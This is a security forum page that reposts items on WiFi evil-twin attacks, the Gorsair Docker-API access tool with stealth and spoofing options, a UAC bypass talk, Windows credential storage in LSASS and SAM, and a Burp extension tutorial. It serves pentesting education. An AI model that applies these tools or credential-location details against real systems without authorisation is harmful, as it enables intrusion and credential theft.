victim was him/herself was a hacker and tricked you! Although you don’t need to name any AP similar to an existing AP you can also create a random free open WiFi type name to gather the client on your AP and start pentesting. Download All 10 Chapters of WiFi Pentesting and Security Book… PDF version contains all of the content and resources found in the web-based guide Want to go even deeper? If you are serious about WiFi Penetration Testing and Security, I have something for you. WiFi Hacking in the Cloud Video Course. Which will take you from a complete beginner to a full blown blue teamer who can not only pentest a WiFi network but can also detect rogue devices on a network, detect network anomalies, perform threat detection on multiple networks at once, create email reports, visual dashboard for easier understanding, incident handling and respond to the Security Operations Center. Apart from that, USP of the course? WiFi Hacking without a WiFi card – A.K.A The Cloud Labs The cloud labs allows you to simply log into your Kali machine and start sniffing WiFi traffic. perform low and high level WiFi attacks, learn all about WiFi security, completely on your lab. WiFi Hacking Without a WiFi Card – Proof of Concept Labs can be accessed in 2 ways 1. Via Browser – Just use your login link and password associated 2. Via SSH -If you want even faster and latency free experience. Here’s a screenshot of the GUI lab running in Chrome browser (Note the URL, it’s running on Amazon AWS cloud): Click here to learn all about the WiFi Security Video Course. Order now for a discount Keep Learning… Sursa: https://rootsh3ll.com/evil-twin-attack/
      • 3
      • Thanks
      • Like
      • Upvote
  14. Nytro

    Gorsair

    Gorsair Gorsair is a penetration testing tool for discovering and remotely accessing Docker APIs from vulnerable Docker containers. Once it has access to the docker daemon, you can use Gorsair to directly execute commands on remote containers. Exposing the docker API on the internet is a tremendous risk, as it can let malicious agents get information on all of the other containers, images and system, as well as potentially getting privileged access to the whole system if the image uses the root user. Command line options -t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74" -p, --ports: (Default: 2375,2376) Set custom ports. -s, --speed: (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It's recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. You might also want to keep it low to keep your discovery stealthy. See this for more info on the nmap timing templates. -v, --verbose: Enable more verbose logs. -D, --decoys: List of decoy IP addresses to use (see the decoy section of the nmap documentation) -e, --interface: Network interface to use --proxies: List of HTTP/SOCKS4 proxies to use to deplay connections with (see documentation) -S, --spoof-ip: IP address to use for IP spoofing --spoof-mac: MAC address to use for MAC spoofing -v, --verbose: Enable verbose logging -h, --help: Display the usage information How can I protect my containers from this attack Avoid putting containers that have access to the docker socket on the internet Avoid using the root account in docker containers Sursa: https://github.com/Ullaakut/Gorsair
      • 2
      • Upvote
  15. ZeroNights Publicat pe 19 ian. 2018 UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most of the research of bypassing UAC has focused on abusing bad elevated application behavior, auto elevation or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation will go into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It will describe how Microsoft tried to fix it in Windows 10, and how you can circumvent their defences. It will also go into detail on a previously undocumented technique to abuse the assumed, more secure, Over-The-Shoulder elevation on Windows 10. Slides - https://2017.zeronights.org/wp-conten...
  16. Credentials Processes in Windows Authentication 10/12/2016 26 minutes to read Contributors Applies To: Windows Server (Semi-Annual Channel), Windows Server 2016 This reference topic for the IT professional describes how Windows authentication processes credentials. Windows credentials management is the process by which the operating system receives the credentials from the service or user and secures that information for future presentation to the authenticating target. In the case of a domain-joined computer, the authenticating target is the domain controller. The credentials used in authentication are digital documents that associate the user's identity to some form of proof of authenticity, such as a certificate, a password, or a PIN. By default, Windows credentials are validated against the Security Accounts Manager (SAM) database on the local computer, or against Active Directory on a domain-joined computer, through the Winlogon service. Credentials are collected through user input on the logon user interface or programmatically via the application programming interface (API) to be presented to the authenticating target. Local security information is stored in the registry under HKEY_LOCAL_MACHINE\SECURITY. Stored information includes policy settings, default security values, and account information, such as cached logon credentials. A copy of the SAM database is also stored here, although it is write-protected. The following diagram shows the components that are required and the paths that credentials take through the system to authenticate the user or process for a successful logon. The following table describes each component that manages credentials in the authentication process at the point of logon. Authentication components for all systems Component Description User logon Winlogon.exe is the executable file responsible for managing secure user interactions. The Winlogon service initiates the logon process for Windows operating systems by passing the credentials collected by user action on the secure desktop (Logon UI) to the Local Security Authority (LSA) through Secur32.dll. Application logon Application or service logons that do not require interactive logon. Most processes initiated by the user run in user mode by using Secur32.dll whereas processes initiated at startup, such as services, run in kernel mode by using Ksecdd.sys. For more information about user mode and kernel mode, see Applications and User Mode or Services and Kernel Mode in this topic. Secur32.dll The multiple authentication providers that form the foundation of the authentication process. Lsasrv.dll The LSA Server service, which both enforces security policies and acts as the security package manager for the LSA. The LSA contains the Negotiate function, which selects either the NTLM or Kerberos protocol after determining which protocol is to be successful. Security Support Providers A set of providers that can individually invoke one or more authentication protocols. The default set of providers can change with each version of the Windows operating system, and custom providers can be written. Netlogon.dll The services that the Net Logon service performs are as follows: - Maintains the computer's secure channel (not to be confused with Schannel) to a domain controller. - Passes the user's credentials through a secure channel to the domain controller and returns the domain security identifiers (SIDs) and user rights for the user. - Publishes service resource records in the Domain Name System (DNS) and uses DNS to resolve names to the Internet Protocol (IP) addresses of domain controllers. - Implements the replication protocol based on remote procedure call (RPC) for synchronizing primary domain controllers (PDCs) and backup domain controllers (BDCs). Samsrv.dll The Security Accounts Manager (SAM), which stores local security accounts, enforces locally stored policies and supports APIs. Registry The Registry contains a copy of the SAM database, local security policy settings, default security values, and account information that is only accessible to the system. This topic contains the following sections: Credential input for user logon Credential input for application and service logon Local Security Authority Cached credentials and validation Credential storage and validation Security Accounts Manager database Local domains and trusted domains Certificates in Windows authentication Credential input for user logon In Windows Server 2008 and Windows Vista, the Graphical Identification and Authentication (GINA) architecture was replaced with a credential provider model, which made it possible to enumerate different logon types through the use of logon tiles. Both models are described below. Graphical Identification and Authentication architecture The Graphical Identification and Authentication (GINA) architecture applies to the Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Windows 2000 Professional operating systems. In these systems, every interactive logon session creates a separate instance of the Winlogon service. The GINA architecture is loaded into the process space used by Winlogon, receives and processes the credentials, and makes the calls to the authentication interfaces through LSALogonUser. The instances of Winlogon for an interactive logon run in Session 0. Session 0 hosts system services and other critical processes, including the Local Security Authority (LSA) process. The following diagram shows the credential process for Windows Server 2003, Microsoft Windows 2000 Server, Windows XP, and Microsoft Windows 2000 Professional. Credential provider architecture The credential provider architecture applies to those versions designated in the Applies To list at the beginning of this topic. In these systems, the credentials input architecture changed to an extensible design by using credential providers. These providers are represented by the different logon tiles on the secure desktop that permit any number of logon scenarios - different accounts for the same user and different authentication methods, such as password, smart card, and biometrics. With the credential provider architecture, Winlogon always starts Logon UI after it receives a secure attention sequence event. Logon UI queries each credential provider for the number of different credential types the provider is configured to enumerate. Credential providers have the option of specifying one of these tiles as the default. After all providers have enumerated their tiles, Logon UI displays them to the user. The user interacts with a tile to supply their credentials. Logon UI submits these credentials for authentication. Credential providers are not enforcement mechanisms. They are used to gather and serialize credentials. The Local Security Authority and authentication packages enforce security. Credential providers are registered on the computer and are responsible for the following: Describing the credential information required for authentication. Handling communication and logic with external authentication authorities. Packaging credentials for interactive and network logon. Packaging credentials for interactive and network logon includes the process of serialization. By serializing credentials multiple logon tiles can be displayed on the logon UI. Therefore, your organization can control the logon display such as users, target systems for logon, pre-logon access to the network and workstation lock/unlock policies - through the use of customized credential providers. Multiple credential providers can co-exist on the same computer. Single sign-on (SSO) providers can be developed as a standard credential provider or as a Pre-Logon-Access Provider. Each version of Windows contains one default credential provider and one default Pre-Logon-Access Provider (PLAP), also known as the SSO provider. The SSO provider permits users to make a connection to a network before logging on to the local computer. When this provider is implemented, the provider does not enumerate tiles on Logon UI. A SSO provider is intended to be used in the following scenarios: Network authentication and computer logon are handled by different credential providers. Variations to this scenario include: A user has the option of connecting to a network, such as connecting to a virtual private network (VPN), before logging on to the computer but is not required to make this connection. Network authentication is required to retrieve information used during interactive authentication on the local computer. Multiple network authentications are followed by one of the other scenarios. For example, a user authenticates to an Internet service provider (ISP), authenticates to a VPN, and then uses their user account credentials to log on locally. Cached credentials are disabled, and a Remote Access Services connection through VPN is required before local logon to authenticate the user. A domain user does not have a local account set up on a domain-joined computer and must establish a Remote Access Services connection through VPN connection before completing interactive logon. Network authentication and computer logon are handled by the same credential provider. In this scenario, the user is required to connect to the network before logging on to the computer. Logon tile enumeration The credential provider enumerates logon tiles in the following instances: For those operating systems designated in the Applies to list at the beginning of this topic. The credential provider enumerates the tiles for workstation logon. The credential provider typically serializes credentials for authentication to the local security authority. This process displays tiles specific for each user and specific to each user's target systems. The logon and authentication architecture lets a user use tiles enumerated by the credential provider to unlock a workstation. Typically, the currently logged-on user is the default tile, but if more than one user is logged on, numerous tiles are displayed. The credential provider enumerates tiles in response to a user request to change their password or other private information, such as a PIN. Typically, the currently logged-on user is the default tile; however, if more than one user is logged on, numerous tiles are displayed. The credential provider enumerates tiles based on the serialized credentials to be used for authentication on remote computers. Credential UI does not use the same instance of the provider as the Logon UI, Unlock Workstation, or Change Password. Therefore, state information cannot be maintained in the provider between instances of Credential UI. This structure results in one tile for each remote computer logon, assuming the credentials have been correctly serialized. This scenario is also used in User Account Control (UAC), which can help prevent unauthorized changes to a computer by prompting the user for permission or an administrator password before permitting actions that could potentially affect the computer's operation or that could change settings that affect other users of the computer. The following diagram shows the credential process for the operating systems designated in the Applies To list at the beginning of this topic. Credential input for application and service logon Windows authentication is designed to manage credentials for applications or services that do not require user interaction. Applications in user mode are limited in terms of what system resources they have access to, while services can have unrestricted access to the system memory and external devices. System services and transport-level applications access an Security Support Provider (SSP) through the Security Support Provider Interface (SSPI) in Windows, which provides functions for enumerating the security packages available on a system, selecting a package, and using that package to obtain an authenticated connection. When a client/server connection is authenticated: The application on the client side of the connection sends credentials to the server by using the SSPI function InitializeSecurityContext (General). The application on the server side of the connection responds with the SSPI function AcceptSecurityContext (General). The SSPI functions InitializeSecurityContext (General) and AcceptSecurityContext (General) are repeated until all the necessary authentication messages have been exchanged to either succeed or fail authentication. After the connection has been authenticated, the LSA on the server uses information from the client to build the security context, which contains an access token. The server can then call the SSPI function ImpersonateSecurityContext to attach the access token to an impersonation thread for the service. Applications and user mode User mode in Windows is composed of two systems capable of passing I/O requests to the appropriate kernel-mode drivers: the environment system, which runs applications written for many different types of operating systems, and the integral system, which operates system-specific functions on behalf of the environment system. The integral system manages operating system'specific functions on behalf of the environment system and consists of a security system process (the LSA), a workstation service, and a server service. The security system process deals with security tokens, grants or denies permissions to access user accounts based on resource permissions, handles logon requests and initiates logon authentication, and determines which system resources the operating system needs to audit. Applications can run in user mode where the application can run as any principal, including in the security context of Local System (SYSTEM). Applications can also run in kernel mode where the application can run in the security context of Local System (SYSTEM). SSPI is available through the Secur32.dll module, which is an API used for obtaining integrated security services for authentication, message integrity, and message privacy. It provides an abstraction layer between application-level protocols and security protocols. Because different applications require different ways of identifying or authenticating users and different ways of encrypting data as it travels across a network, SSPI provides a way to access dynamic-link libraries (DLLs) that contain different authentication and cryptographic functions. These DLLs are called Security Support Providers (SSPs). Managed service accounts and virtual accounts were introduced in Windows Server 2008 R2 and Windows 7 to provide crucial applications, such as Microsoft SQL Server and Internet Information Services (IIS), with the isolation of their own domain accounts, while eliminating the need for an administrator to manually administer the service principal name (SPN) and credentials for these accounts. For more information about these features and their role in authentication, see Managed Service Accounts Documentation for Windows 7 and Windows Server 2008 R2 and Group Managed Service Accounts Overview. Services and kernel mode Even though most Windows applications run in the security context of the user who starts them, this is not true of services. Many Windows services, such as network and printing services, are started by the service controller when the user starts the computer. These services might run as Local Service or Local System and might continue to run after the last human user logs off. Note Services normally run in security contexts known as Local System (SYSTEM), Network Service, or Local Service. Windows Server 2008 R2 introduced services that run under a managed service account, which are domain principals. Before starting a service, the service controller logs on by using the account that is designated for the service, and then presents the service's credentials for authentication by the LSA. The Windows service implements a programmatic interface that the service controller manager can use to control the service. A Windows service can be started automatically when the system is started or manually with a service control program. For example, when a Windows client computer joins a domain, the messenger service on the computer connects to a domain controller and opens a secure channel to it. To obtain an authenticated connection, the service must have credentials that the remote computer's Local Security Authority (LSA) trusts. When communicating with other computers in the network, LSA uses the credentials for the local computer's domain account, as do all other services running in the security context of the Local System and Network Service. Services on the local computer run as SYSTEM so credentials do not need to be presented to the LSA. The file Ksecdd.sys manages and encrypts these credentials and uses a local procedure call into the LSA. The file type is DRV (driver) and is known as the kernel-mode Security Support Provider (SSP) and, in those versions designated in the Applies To list at the beginning of this topic, is FIPS 140-2 Level 1-compliant. Kernel mode has full access to the hardware and system resources of the computer. The kernel mode stops user-mode services and applications from accessing critical areas of the operating system that they should not have access to. Local Security Authority The Local Security Authority (LSA) is a protected system process that authenticates and logs users on to the local computer. In addition, LSA maintains information about all aspects of local security on a computer (these aspects are collectively known as the local security policy), and it provides various services for translation between names and security identifiers (SIDs). The security system process, Local Security Authority Server Service (LSASS), keeps track of the security policies and the accounts that are in effect on a computer system. The LSA validates a user's identity based on which of the following two entities issued the user's account: Local Security Authority. The LSA can validate user information by checking the Security Accounts Manager (SAM) database located on the same computer. Any workstation or member server can store local user accounts and information about local groups. However, these accounts can be used for accessing only that workstation or computer. Security authority for the local domain or for a trusted domain. The LSA contacts the entity that issued the account and requests verification that the account is valid and that the request originated from the account holder. The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. The stored credentials let users seamlessly access network resources, such as file shares, Exchange Server mailboxes, and SharePoint sites, without re-entering their credentials for each remote service. LSASS can store credentials in multiple forms, including: Reversibly encrypted plaintext Kerberos tickets (ticket-granting tickets (TGTs), service tickets) NT hash LAN Manager (LM) hash If the user logs on to Windows by using a smart card, LSASS does not store a plaintext password, but it stores the corresponding NT hash value for the account and the plaintext PIN for the smart card. If the account attribute is enabled for a smart card that is required for interactive logon, a random NT hash value is automatically generated for the account instead of the original password hash. The password hash that is automatically generated when the attribute is set does not change. If a user logs on to a Windows-based computer with a password that is compatible with LAN Manager (LM) hashes, this authenticator is present in memory. The storage of plaintext credentials in memory cannot be disabled, even if the credential providers that require them are disabled. The stored credentials are directly associated with the Local Security Authority Subsystem Service (LSASS) logon sessions that have been started after the last restart and have not been closed. For example, LSA sessions with stored LSA credentials are created when a user does any of the following: Logs on to a local session or Remote Desktop Protocol (RDP) session on the computer Runs a task by using the RunAs option Runs an active Windows service on the computer Runs a scheduled task or batch job Runs a task on the local computer by using a remote administration tool In some circumstances, the LSA secrets, which are secret pieces of data that are accessible only to SYSTEM account processes, are stored on the hard disk drive. Some of these secrets are credentials that must persist after reboot, and they are stored in encrypted form on the hard disk drive. Credentials stored as LSA secrets might include: Account password for the computer's Active Directory Domain Services (AD DS) account Account passwords for Windows services that are configured on the computer Account passwords for configured scheduled tasks Account passwords for IIS application pools and websites Passwords for Microsoft accounts Introduced in Windows 8.1, the client operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This protection increases security for the credentials that the LSA stores and manages. For more information about these additional protections, see Configuring Additional LSA Protection. Cached credentials and validation Validation mechanisms rely on the presentation of credentials at the time of logon. However, when the computer is disconnected from a domain controller, and the user is presenting domain credentials, Windows uses the process of cached credentials in the validation mechanism. Each time a user logs on to a domain, Windows caches the credentials supplied and stores them in the security hive in the registry of the operation system. With cached credentials, the user can log on to a domain member without being connected to a domain controller within that domain. Credential storage and validation It is not always desirable to use one set of credentials for access to different resources. For example, an administrator might want to use administrative rather than user credentials when accessing a remote server. Similarly, if a user accesses external resources, such as a bank account, he or she can only use credentials that are different than their domain credentials. The following sections describe the differences in credential management between current versions of Windows operating systems and the Windows Vista and Windows XP operating systems. Remote logon credential processes The Remote Desktop Protocol (RDP) manages the credentials of the user who connects to a remote computer by using the Remote Desktop Client, which was introduced in Windows 8. The credentials in plaintext form are sent to the target host where the host attempts to perform the authentication process, and, if successful, connects the user to allowed resources. RDP does not store the credentials on the client, but the user's domain credentials are stored in the LSASS. Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account. Automatic restart sign-on credential process When a user signs in on a Windows 8.1 device, LSA saves the user credentials in encrypted memory that are accessible only by LSASS.exe. When Windows Update initiates an automatic restart without user presence, these credentials are used to configure Autologon for the user. On restart, the user is automatically signed in via the Autologon mechanism, and then the computer is additionally locked to protect the user's session. The locking is initiated through Winlogon whereas the credential management is done by LSA. By automatically signing in and locking the user's session on the console, the user's lock screen applications is restarted and available. For more information about ARSO, see Winlogon Automatic Restart Sign-On (ARSO). Stored user names and passwords in Windows Vista and Windows XP In Windows Server 2008 , Windows Server 2003, Windows Vista, and Windows XP, Stored User Names and Passwords in Control Panel simplifies the management and use of multiple sets of logon credentials, including X.509 certificates used with smart cards and Windows Live credentials (now called Microsoft account). The credentials - part of the user's profile - are stored until needed. This action can increase security on a per-resource basis by ensuring that if one password is compromised, it does not compromise all security. After a user logs on and attempts to access additional password-protected resources, such as a share on a server, and if the user's default logon credentials are not sufficient to gain access, Stored User Names and Passwords is queried. If alternate credentials with the correct logon information have been saved in Stored User Names and Passwords, these credentials are used to gain access. Otherwise, the user is prompted to supply new credentials, which can then be saved for reuse, either later in the logon session or during a subsequent session. The following restrictions apply: If Stored User Names and Passwords contains invalid or incorrect credentials for a specific resource, access to the resource is denied, and the Stored User Names and Passwords dialog box does not appear. Stored User Names and Passwords stores credentials only for NTLM, Kerberos protocol, Microsoft account (formerly Windows Live ID), and Secure Sockets Layer (SSL) authentication. Some versions of Internet Explorer maintain their own cache for basic authentication. These credentials become an encrypted part of a user's local profile in the \Documents and Settings\Username\Application Data\Microsoft\Credentials directory. As a result, these credentials can roam with the user if the user's network policy supports Roaming User Profiles. However, if the user has copies of Stored User Names and Passwords on two different computers and changes the credentials that are associated with the resource on one of these computers, the change is not propagated to Stored User Names and Passwords on the second computer. Windows Vault and Credential Manager Credential Manager was introduced in Windows Server 2008 R2 and Windows 7 as a Control Panel feature to store and manage user names and passwords. Credential Manager lets users store credentials relevant to other systems and websites in the secure Windows Vault. Some versions of Internet Explorer use this feature for authentication to websites. Credential management by using Credential Manager is controlled by the user on the local computer. Users can save and store credentials from supported browsers and Windows applications to make it convenient when they need to sign in to these resources. Credentials are saved in special encrypted folders on the computer under the user's profile. Applications that support this feature (through the use of the Credential Manager APIs), such as web browsers and apps, can present the correct credentials to other computers and websites during the logon process. When a website, an application, or another computer requests authentication through NTLM or the Kerberos protocol, a dialog box appears in which you select the Update Default Credentials or Save Password check box. This dialog box that lets a user save credentials locally is generated by an application that supports the Credential Manager APIs. If the user selects the Save Password check box, Credential Manager keeps track of the user's user name, password, and related information for the authentication service that is in use. The next time the service is used, Credential Manager automatically supplies the credential that is stored in the Windows Vault. If it is not accepted, the user is prompted for the correct access information. If access is granted with the new credentials, Credential Manager overwrites the previous credential with the new one and then stores the new credential in the Windows Vault. Security Accounts Manager database The Security Accounts Manager (SAM) is a database that stores local user accounts and groups. It is present in every Windows operating system; however, when a computer is joined to a domain, Active Directory manages domain accounts in Active Directory domains. For example, client computers running a Windows operating system participate in a network domain by communicating with a domain controller even when no human user is logged on. To initiate communications, the computer must have an active account in the domain. Before accepting communications from the computer, the LSA on the domain controller authenticates the computer's identity and then constructs the computer's security context just as it does for a human security principal. This security context defines the identity and capabilities of a user or service on a particular computer or a user, service, or computer on a network. For example, the access token contained within the security context defines the resources (such as a file share or printer) that can be accessed and the actions (such as Read, Write, or Modify) that can be performed by that principal - a user, computer, or service on that resource. The security context of a user or computer can vary from one computer to another, such as when a user logs on to a server or a workstation other than the user's own primary workstation. It can also vary from one session to another, such as when an administrator modifies the user's rights and permissions. In addition, the security context is usually different when a user or computer is operating on a stand-alone basis, in a network, or as part of an Active Directory domain. Local domains and trusted domains When a trust exists between two domains, the authentication mechanisms for each domain rely on the validity of the authentications coming from the other domain. Trusts help to provide controlled access to shared resources in a resource domain (the trusting domain) by verifying that incoming authentication requests come from a trusted authority (the trusted domain). In this way, trusts act as bridges that let only validated authentication requests travel between domains. How a specific trust passes authentication requests depends on how it is configured. Trust relationships can be one-way, by providing access from the trusted domain to resources in the trusting domain, or two-way, by providing access from each domain to resources in the other domain. Trusts are also either nontransitive, in which case a trust exists only between the two trust partner domains, or transitive, in which case a trust automatically extends to any other domains that either of the partners trusts. For information about domain and forest trust relationships regarding authentication, see Delegated Authentication and Trust Relationships. Certificates in Windows authentication A public key infrastructure (PKI) is the combination of software, encryption technologies, processes, and services that enable an organization to secure its communications and business transactions. The ability of a PKI to secure communications and business transactions is based on the exchange of digital certificates between authenticated users and trusted resources. A digital certificate is an electronic document that contains information about the entity it belongs to, the entity it was issued by, a unique serial number or some other unique identification, issuance and expiration dates, and a digital fingerprint. Authentication is the process of determining if a remote host can be trusted. To establish its trustworthiness, the remote host must provide an acceptable authentication certificate. Remote hosts establish their trustworthiness by obtaining a certificate from a certification authority (CA). The CA can, in turn, have certification from a higher authority, which creates a chain of trust. To determine whether a certificate is trustworthy, an application must determine the identity of the root CA, and then determine if it is trustworthy. Similarly, the remote host or local computer must determine if the certificate presented by the user or application is authentic. The certificate presented by the user through the LSA and SSPI is evaluated for authenticity on the local computer for local logon, on the network, or on the domain through the certificate stores in Active Directory. To produce a certificate, authentication data passes through hash algorithms, such as Secure Hash Algorithm 1 (SHA1), to produce a message digest. The message digest is then digitally signed by using the sender's private key to prove that the message digest was produced by the sender. Note SHA1 is the default in Windows 7 and Windows Vista, but was changed to SHA2 in Windows 8. Smart card authentication Smart card technology is an example of certificate-based authentication. Logging on to a network with a smart card provides a strong form of authentication because it uses cryptography-based identification and proof of possession when authenticating a user to a domain. Active Directory Certificate Services (AD CS) provides the cryptographic-based identification through the issuance of a logon certificate for each smart card. For information about smart card authentication, see the Windows Smart Card Technical Reference. Virtual smart card technology was introduced in Windows 8. It stores the smart card's certificate in the PC, and then protects it by using the device's tamper-proof Trusted Platform Module (TPM) security chip. In this way, the PC actually becomes the smart card which must receive the user's PIN in order to be authenticated. Remote and wireless authentication Remote and wireless network authentication is another technology that uses certificates for authentication. The Internet Authentication Service (IAS) and virtual private network servers use Extensible Authentication Protocol-Transport Level Security (EAP-TLS), Protected Extensible Authentication Protocol (PEAP), or Internet Protocol security (IPsec) to perform certificate-based authentication for many types of network access, including virtual private network (VPN) and wireless connections. For information about certificate-based authentication in networking, see Network access authentication and certificates. Sursa: https://docs.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication
  17. February 7, 2019 Jake Burp Extension Python Tutorial – Encode/Decode/Hash This post provides step by step instructions for writing a Burp extension using Python. This is different from my previous extension writing tutorial, where we only worked in the message tab, and I will be moving a bit more quickly than in that post. Here is what this post will cover: Importing required modules and accessing the Burp Created a tab for the extension Writing the GUI text fields and buttons Writing functions that occur when you click the buttons This extension will have its own tab and GUI components, not to mention will be a little more useful than the extension written previously. Here is what we are going to be making: This is inspired from a tool of the same name included in OWASP’s ZAP. Let’s get started. Setup Create a folder where you’ll store your extensions – I named mine extensions Download the Jython standalone JAR file – Place into the extensions folder Download exceptions_fix.py to the extensions folder – this will make debugging easier Configure Burp to use Jython – Extender > Options > Python Environment > Select file Create a new file (encodeDecodeHash.py) in your favorite text editor (save it in your extensions folder) Importing required modules and accessing the Extender API, and implementing the debugger Let’s write some code: from burp import IBurpExtender, ITab from javax import swing from java.awt import BorderLayout import sys try: from exceptions_fix import FixBurpExceptions except ImportError: pass The IBurpExtender module is required for all extensions, while ITab will register the tab in Burp and send Burp the UI that we will define. The swing library is what is used to build GUI applications with Jython, and we’ll be using layout management, specifically BorderLayout from the java.awt library. The sys module is imported to allow Python errors to be shown in stdout with the help of the FixBurpExceptions script. I placed that in a Try/Except block so if we don’t have the script the code will still work fine. I’ll be adding more imports when we start writing encoding method, but this is enough for now. This next code snippet will register our extension and create a new tab that will contain the UI. If you’re following along type or paste this code after the imports: class BurpExtender(IBurpExtender, ITab): def registerExtenderCallbacks(self, callbacks): # Required for easier debugging: # https://github.com/securityMB/burp-exceptions sys.stdout = callbacks.getStdout() # Keep a reference to our callbacks object self.callbacks = callbacks # Set our extension name self.callbacks.setExtensionName("Encode/Decode/Hash") # Create the tab self.tab = swing.JPanel(BorderLayout()) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement ITab def getTabCaption(self): """Return the text to be displayed on the tab""" return "Encode/Decode/Hash" def getUiComponent(self): """Passes the UI to burp""" return self.tab try: FixBurpExceptions() except: pass This class implements IBurpExtender, which is required for all extensions and must be called BurpExtender. Within the required method, registerExtendedCallbacks, the line self.callbacks keeps a reference to Burp so we can interact with it, and in our case will be used to create the tab in Burp. ITab requires two methods, getTabCaption and getUiComponent, where getTabCaption returns the name of the tab, and getUiComponent returns the UI itself (self.tab), which is created in the line self.tab=swing.JPanel(). FixBurpExceptions is called at the end of the script just in case we have an error (Thanks @SecurityMB!). Save the script to your extensions folder and then load the file into Burp: Extender > Extensions > Add > Extension Details > Extension Type: Python > Select file… > encodeDecodeHash.py The extension should load and you should have a new tab: This tab doesn’t have any features yet, so let’s build the skeleton of the UI. Before I go into the code, I’ll model out the GUI so that it will hopefully make a little more sense. There are different layout managers that you can use in Java, and I chose to use BorderLayout in the main tab, so when I place panels on the tab, I can specify that they should go in relative positions, such as North or Center. Within the two panels I created boxes that contain other boxes. I did this so that text areas and labels would appear on different lines, but stay in the general area that I wanted them to. There are probably better ways to do this, but here is the model: Onto the code: class BurpExtender(IBurpExtender, ITab): ... self.tab = swing.Jpanel(BorderLayout()) # Create the text area at the top of the tab textPanel = swing.JPanel() # Create the label for the text area boxVertical = swing.Box.createVerticalBox() boxHorizontal = swing.Box.createHorizontalBox() textLabel = swing.JLabel("Text to be encoded/decoded/hashed") boxHorizontal.add(textLabel) boxVertical.add(boxHorizontal) # Create the text area itself boxHorizontal = swing.Box.createHorizontalBox() self.textArea = swing.JTextArea('', 6, 100) self.textArea.setLineWrap(True) boxHorizontal.add(self.textArea) boxVertical.add(boxHorizontal) # Add the text label and area to the text panel textPanel.add(boxVertical) # Add the text panel to the top of the main tab self.tab.add(textPanel, BorderLayout.NORTH) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return ... A bit of explanation. The code (textPanel = swing.JPanel()) creates a new panel that will contain the text label and text area. Then, a box is created (boxVertical), that will be used to hold other boxes (boxHorizontal) that contain the text label and area. The horizontal boxes get added to the vertical box (boxVertical.add(boxHorizontal)), the vertical box is added to the panel we created (textPanel.add(boxVertical)), and that panel is added to the main tab panel at the top (BorderLayout.NORTH). Save the code, unload/reload the extension and this is what you should see: Now we’ll add the tabs: self.tab.add(textPanel, BorderLayout.NORTH) # Created a tabbed pane to go in the center of the # main tab, below the text area tabbedPane = swing.JTabbedPane() self.tab.add("Center", tabbedPane); # First tab firstTab = swing.JPanel() firstTab.layout = BorderLayout() tabbedPane.addTab("Encode", firstTab) # Second tab secondTab = swing.JPanel() secondTab.layout = BorderLayout() tabbedPane.addTab("Decode", secondTab) # Third tab thirdTab = swing.JPanel() thirdTab.layout = BorderLayout() tabbedPane.addTab("Hash", thirdTab) # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return ... After you add this code and save the file, you should have your tabs: To keep this post short, we’re only going to build out the Encode tab, but the steps will be the same for each tab. # First tab firstTab = swing.JPanel() firstTab.layout = BorderLayout() tabbedPane.addTab("Encode", firstTab) # Button for first tab buttonPanel = swing.JPanel() buttonPanel.add(swing.JButton('Encode', actionPerformed=self.encode)) firstTab.add(buttonPanel, "North") # Panel for the encoders. Each label and text field # will go in horizontal boxes which will then go in # a vertical box encPanel = swing.JPanel() boxVertical = swing.Box.createVerticalBox() boxHorizontal = swing.Box.createHorizontalBox() self.b64EncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" Base64 :")) boxHorizontal.add(self.b64EncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.urlEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" URL :")) boxHorizontal.add(self.urlEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.asciiHexEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" Ascii Hex :")) boxHorizontal.add(self.asciiHexEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.htmlEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" HTML :")) boxHorizontal.add(self.htmlEncField) boxVertical.add(boxHorizontal) boxHorizontal = swing.Box.createHorizontalBox() self.jsEncField = swing.JTextField('', 75) boxHorizontal.add(swing.JLabel(" JavaScript:")) boxHorizontal.add(self.jsEncField) boxVertical.add(boxHorizontal) # Add the vertical box to the Encode tab firstTab.add(boxVertical, "Center") # Second tab ... # Third tab ... # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement the functions from the button clicks def encode(self, event): pass # Implement ITab def getTabCaption(self): First we create a panel (buttonPanel) to hold our button, and then we add a button to the panel and specify the argument actionPerformed=self.encode, where self.encode is a method that will run when the button is clicked. We define encode at the end of the code snippet, and currently have it doing nothing. We’ll implement the encoders later. Now that our panel has a button, we add that to the first tab of the panel (firstTab.add(buttonPanel, “North”)). Next we create a separate panel for the encoder text labels and fields. Similar to before, we create a big box (boxVertical), and then create a horizontal box (boxHorizontal) for each pair of labels/textfields, which then get added to the big box. Finally that big box gets added to the tab. After saving the file and unloading/reloading, this is what the program should look like: The button might not seem to do anything, but it is actually executing the encode method we defined (which does nothing). Lets fix that method and have it encode the user input: … try: 